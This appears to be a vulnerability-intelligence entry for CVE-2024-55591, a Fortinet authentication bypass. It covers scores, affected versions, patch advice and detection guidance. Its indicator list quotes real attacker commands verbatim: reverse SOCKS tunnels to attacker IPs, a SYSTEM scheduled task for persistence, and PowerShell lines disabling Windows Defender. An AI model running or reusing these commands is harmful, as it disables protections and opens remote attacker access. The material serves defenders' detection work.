CVE-2024-55591
published 2025-01-14

Priority: P1 (100), critical
CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Tags: KEV, ITW, EXPLOIT, Ransomware, Initial access
CISA Known Exploited Vulnerability, due 2025-01-21
Exploited in the wild
EPSS: 98.26% (99.9th percentile)
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7.0.0 through 7.0.16 and FortiProxy version 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12 allows a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.

Affected (8 ranges)

Vendor    Product     Version range        Fixed in
fortinet  fortios
fortinet  fortios     >= 7.0.0 < 7.0.17    7.0.17
fortinet  fortios     7.0.0 – 7.0.16
fortinet  fortiproxy
fortinet  fortiproxy  >= 7.0.0 < 7.0.20    7.0.20
fortinet  fortiproxy  7.0.0 – 7.0.19
fortinet  fortiproxy  >= 7.2.0 < 7.2.13    7.2.13
fortinet  fortiproxy  7.2.0 – 7.2.12

Detection & IOCs (extracted from sources)

ip: 193.233.202.17
ip: 77.110.122.137
port: 44729
port: 37182
filename: svchost32.exe
path: C:\Windows\Temp\svchost32.exe
filename: win.exe
filename: README-GENTLEMEN.txt
other: .fjn1jw
command: C:\Users\REDACTED\Documents\win.exe --password REDACTED --T 200 --superfast
command: C:\Windows\Temp\svchost32.exe client 193.233.202[.]17:44729 R:1081:socks
command: cmd.exe /C schtasks /create /tn WindowsConnSvc /tr C:\Windows\Temp\svchost32.exe client 77.110.122[.]137:37182 R:1085:socks /sc minute /mo 2 /ru SYSTEM /f > C:\Windows\Temp\RbHoNVNU.tmp 2>&1
command: powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true; Stop-Service -Name WinDefend -Force; Set-Service -Name WinDefend -StartupType Disabled
command: powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true -Force
command: powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled -Force
command: powershell -Command Add-MpPreference -ExclusionProcess C:\Users\[REDACTED]\downloads\G_hlm7jj_windows_amd64.exe -Force
command: powershell -Command Add-MpPreference -ExclusionPath C:\ -Force
other: forticloud-tech
other: fortigate-firewall
other: adnimistrator
path: C:\Windows\Temp\RbHoNVNU.tmp
  • CVE-2024-55591 exploitation uses WebSocket-based attacks via the jsconsole interface or direct HTTPS requests to exposed firewall management interfaces to gain super_admin privileges
  • CVE-2024-55591 exploitation involves crafted requests to the Node.js websocket module; monitor FortiOS/FortiProxy management interface for anomalous WebSocket connections
  • Post-exploitation: watch for creation of rogue local/admin accounts on FortiGate devices, especially accounts named forticloud-tech, fortigate-firewall, or adnimistrator (note typo), and addition to SSL VPN user groups
  • jsconsole usage was a common thread across CVE-2024-55591 exploitation intrusions; monitor FortiGate logs for jsconsole activity from unexpected source IPs
  • CVE-2024-55591 mass-exploitation campaign followed four phases: vulnerability scanning (Nov 16–23), reconnaissance (Nov 22–27), SSL VPN configuration (Dec 4–7), lateral movement (Dec 16–27, 2024)
  • Detect The Gentlemen ransomware post-exploitation: look for Scheduled Task named 'WindowsConnSvc' executing svchost32.exe from C:\Windows\Temp with SOCKS proxy arguments, running every 2 minutes as SYSTEM
  • Detect The Gentlemen ransomware: ransom note filename README-GENTLEMEN.txt and encrypted file extension .fjn1jw are unique indicators for file-based detection
  • Detect defense evasion: PowerShell commands disabling WinDefend service and adding C:\ as an exclusion path are strong indicators of pre-ransomware activity
  • Monitor Windows Event Log clearing: Event ID 104 (Application/System logs cleared) and Event ID 1102 (Security log cleared) observed in The Gentlemen attacks post-CVE-2024-55591 exploitation
  • SuperBlack ransomware (Mora_001) post-exploitation: attacker modifies firewall automation tasks to recreate rogue admin accounts if removed; monitor FortiGate automation task changes
  • SuperBlack ransomware deploys a wiper called WipeBlack after encryption to remove ransomware executable traces; also used by BrainCipher, EstateRansomware, and SenSayQ ransomware
  • CVE-2024-55591 affects FortiOS 7.0.0–7.0.16 and FortiProxy 7.0.0–7.0.19 and 7.2.0–7.2.12; patched in FortiOS 7.0.17+ and FortiProxy 7.0.20/7.2.13+. Customers who patched for CVE-2024-55591 are also protected against CVE-2025-24472.
  • Fortinet confirmed CVE-2025-24472 was NOT exploited in the wild at time of disclosure; only CVE-2024-55591 was confirmed exploited. Patching for CVE-2024-55591 covers both.
  • If patching is not immediately possible, Fortinet advises disabling the HTTP/HTTPS administrative interface or restricting access via local-in policies to limit exposure to CVE-2024-55591.
  • CVE-2024-55591 was exploited as a zero-day since at least mid-November 2024, before Fortinet's January 14, 2025 disclosure; organizations should assume potential compromise if management interfaces were internet-exposed during that window.

CVSS provenance

nvd: v3.1, 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck: 9.8 CRITICAL
cisa: 9.8 CRITICAL